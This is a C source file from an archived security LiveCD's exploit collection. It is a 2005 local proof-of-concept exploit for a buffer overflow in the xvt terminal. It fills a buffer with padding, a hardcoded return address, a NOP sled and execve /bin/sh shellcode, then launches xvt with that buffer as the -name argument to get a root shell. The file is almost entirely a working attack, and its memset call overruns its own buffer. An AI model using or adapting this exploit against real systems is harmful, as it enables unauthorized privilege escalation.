home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / terminals / xvt-exp.c < prev   
C/C++ Source or Header  |  2005-02-12  |  699b  |  39 lines

  1. /*
  2.  
  3.    /usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.
  4.  
  5.    tshaw:~$ ./expl
  6.    bash#
  7.  
  8. */
  9.  
  10. #include <stdio.h>
  11. #include <stdlib.h>
  12.  
  13. int main()
  14.  
  15. {
  16.  
  17.     char buf[234];
  18.     int i;
  19.  
  20.     char code[] =
  21.         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  22.         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  23.         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  24.  
  25.  
  26.     for(i=0; i<76; i++)
  27.         buf[i] = 0x41;
  28.  
  29.     *(long *)&buf[76]=0xbffffab0; /* ret addr */
  30.  
  31.     memset(buf + 80, 0x90, 234);
  32.     memcpy(buf + 233 - strlen(code), code, strlen(code));
  33.  
  34.     buf[234] = '\0';
  35.  
  36.     execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);                           
  37.  
  38. }
  39.